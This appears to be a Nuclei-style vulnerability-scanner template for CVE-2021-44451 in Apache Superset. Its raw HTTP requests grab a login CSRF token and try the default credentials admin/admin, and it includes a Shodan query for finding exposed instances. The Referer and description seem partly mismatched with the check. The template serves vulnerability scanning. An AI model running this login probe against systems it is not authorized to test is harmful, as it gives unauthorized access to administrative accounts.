id: CVE-2021-44451 info: name: Apache Superset Default Login author: dhiyaneshDK severity: high description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 classification: cve-id: CVE-2021-44451 remediation: Users should upgrade to Apache Superset 1.4.0 or higher. metadata: verified: true shodan-query: title:"Superset" tags: cve,cve2021,apache,superset,default-login requests: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - | POST /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}}/admin/airflow/login csrf_token={{csrf_token}}&username={{username}}&password={{password}} attack: pitchfork payloads: username: - admin password: - admin extractors: - type: regex name: csrf_token group: 1 part: body internal: true regex: - 'value="(.*?)">' matchers-condition: and matchers: - type: word part: body condition: and words: - 'Redirecting...' - '

Redirecting...' - type: word part: header words: - 'session' - type: status status: - 302 # Enhanced by mp on 2022/03/02